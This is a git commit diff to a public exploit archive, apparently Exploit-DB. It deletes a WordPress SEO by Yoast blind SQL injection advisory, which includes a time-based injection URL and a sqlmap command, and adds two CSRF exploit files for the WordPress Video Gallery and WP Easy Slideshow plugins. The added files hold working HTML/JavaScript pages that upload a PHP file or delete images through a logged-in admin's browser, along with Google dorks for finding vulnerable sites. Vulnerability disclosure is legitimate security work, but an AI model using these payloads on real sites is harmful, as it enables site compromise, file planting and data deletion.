DB: 2015-04-06

2 new exploits
2015-04-06 08:36:30 +00:00 · 2015-04-06 08:36:30 +00:00 · f7fce69883
commit f7fce69883
parent 005f370f16
4 changed files with 145 additions and 75 deletions
--- a/files.csv
+++ b/files.csv
@ -32833,7 +32833,7 @@ id,file,description,date,author,platform,type,port
 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
 36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download &  execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
-36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0
+36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
@ -33021,6 +33021,8 @@ id,file,description,date,author,platform,type,port
 36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80
 36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities",2015-04-02,Divya,php,webapps,80
 36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80
 36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80
 36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
 36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
--- a/platforms/aix/dos/36413.txt
+++ b/platforms/aix/dos/36413.txt
@ -1,74 +0,0 @@
 Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
 Version/s Tested: 1.7.3.3
 Patched Version: 1.7.4
 CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
 CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
 WPVULNDB: https://wpvulndb.com/vulnerabilities/7841
 Description:
 WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
 to improve the Search Engine Optimization (SEO) of WordPress sites. The
 latest version at the time of writing (1.7.3.3) has been found to be
 affected by two authenticated (admin, editor or author user) Blind SQL
 Injection vulnerabilities. The plugin has more than one million downloads
 according to WordPress.
 Technical Description:
 The authenticated Blind SQL Injection vulnerability can be found within the
 'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
 parameters are not sufficiently sanitised before being used within a SQL
 query.
 Line 529:
 $orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field(
 $_GET['orderby'] ) ) : 'post_title';
 Line 533:
 order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
 If the GET orderby parameter value is not empty it will pass its value
 through WordPess's own esc_sql() function. According to WordPress this
 function 'Prepares a string for use as an SQL query. A glorified
 addslashes() that works with arrays.'. However, this is not sufficient to
 prevent SQL Injection as can be seen from our Proof of Concept.
 Proof of Concept (PoC):
 The following GET request will cause the SQL query to execute and sleep for
 10 seconds if clicked on as an authenticated admin, editor or author user.
 http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
 Using SQLMap:
 python sqlmap.py -u "
 http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc"
 --batch --technique=B --dbms=MySQL --cookie="wordpress_9d...;
 wordpress_logged_in_9dee67...;"
 Impact:
 As there is no anti-CSRF protection a remote unauthenticated attacker could
 use this vulnerability to execute arbitrary SQL queries on the victim
 WordPress web site by enticing an authenticated admin, editor or author
 user to click on a specially crafted link or visit a page they control.
 One possible attack scenario would be an attacker adding their own
 administrative user to the target WordPress site, allowing them to
 compromise the entire web site.
 Timeline:
 March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
 (WPScan Team - Dewhurst Security).
 March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
 March 10th 2015 - 20:00 GMT: Vendor contacted via email.
 March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave
 expected patch timeline.
 March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
 this issue.
 March 11th 2015 - 12:30 GMT: Advisory released.
--- a/platforms/php/webapps/36610.txt
+++ b/platforms/php/webapps/36610.txt
@ -0,0 +1,61 @@
 # Exploit Title: Wordpress Video Gallery Plugin Multiple CSRF File Upload
 # Google Dork: inurl:/wp-content/plugins/contus-video-gallery
 # Date: 31 March 2015
 # Exploit Author: Divya
 # Vendor Homepage: https://wordpress.org/plugins/contus-video-gallery/
 # Software Link: https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
 # Version: 2.8
 # Tested on: Windows, Linux
 # CVE : None
 CSRF File Upload Exploit Code:
 <html>
 <head>
 <title>
 WP Plugin CSRF File Upload
 </title>
 <body>
 	<script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------103932797413649");
        xhr.withCredentials = true;
        var body = "-----------------------------103932797413649\r\n" + 
          "Content-Disposition: form-data; name=\"myfile\"; filename=\"test.mp4\"\r\n" + 
          "Content-Type: video/mp4\r\n" + 
          "\r\n" + 
          "hello world how are you\r\n" + 
          "-----------------------------103932797413649\r\n" + 
          "Content-Disposition: form-data; name=\"mode\"\r\n" + 
          "\r\n" + 
          "video\r\n" + 
          "-----------------------------103932797413649--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit" onclick="submitRequest();" />
    </form>
  </body>
 </html>
 Other CSRF vulnerable areas of application:
 URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
 Data: myfile=[upload_file_details]&mode=video
 URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
 Data: myfile=[upload_file_details]&mode=image
 URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
 Data: myfile=[upload_file_details]&mode=srt
--- a/platforms/php/webapps/36612.txt
+++ b/platforms/php/webapps/36612.txt
@ -0,0 +1,81 @@
 # Exploit Title: Wordpress WP Easy Slideshow Plugin Multiple Vulnerabilities
 # Google Dork: inurl:/wp-content/uploads/wp-easy-slideshow/
 # Date: 2 April 2015
 # Exploit Author: Divya
 # Vendor Homepage: https://wordpress.org/plugins/wp-easy-slideshow/
 # Software Link: https://downloads.wordpress.org/plugin/wp-easy-slideshow.zip
 # Version: 1.0.3
 # Tested on: Windows, Linux
 # CVE : None
 Delete operation using CSRF:
 <img src="http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=[number]">
 Example: http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=1
 <html>
  <head><title>CSRF Delete Operation</title></head>
  <body>
    <form action="http://192.168.1.2/wp-admin/admin.php">
      <input type="hidden" name="page" value="wss-images" />
      <input type="hidden" name="del_id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 Arbitrary File Upload using CSRF:
 <html>
  <head><title>WP CSRF File Upload</title></head>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/wordpress/wp-admin/admin.php?page=wss-add-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1559691976562");
        xhr.withCredentials = true;
        var body = "-----------------------------1559691976562\r\n" + 
          "Content-Disposition: form-data; name=\"wss_image\"; filename=\"myfile.php\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\x3c?php\r\n" + 
          "phpinfo();\r\n" + 
          "?\x3e\r\n" + 
          "-----------------------------1559691976562\r\n" + 
          "Content-Disposition: form-data; name=\"desc_content\"\r\n" + 
          "\r\n" + 
          "CSRF File Upload\r\n" + 
          "-----------------------------1559691976562\r\n" + 
          "Content-Disposition: form-data; name=\"image_link\"\r\n" + 
          "\r\n" + 
          "linkData\r\n" + 
          "-----------------------------1559691976562\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Submit\r\n" + 
          "-----------------------------1559691976562--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
 </html>
 Arbitrary File Upload (Authenticated):
 URL: http://192.168.1.2/wp-admin/admin.php?page=wss-add-image
 The upload script allows uploading arbitrary files. The files are renamed to numbers like 1,2,3,... The uploaded files cannot be executed on server.
 Upload Location: http://192.168.1.2/wp-content/uploads/wp-easy-slideshow/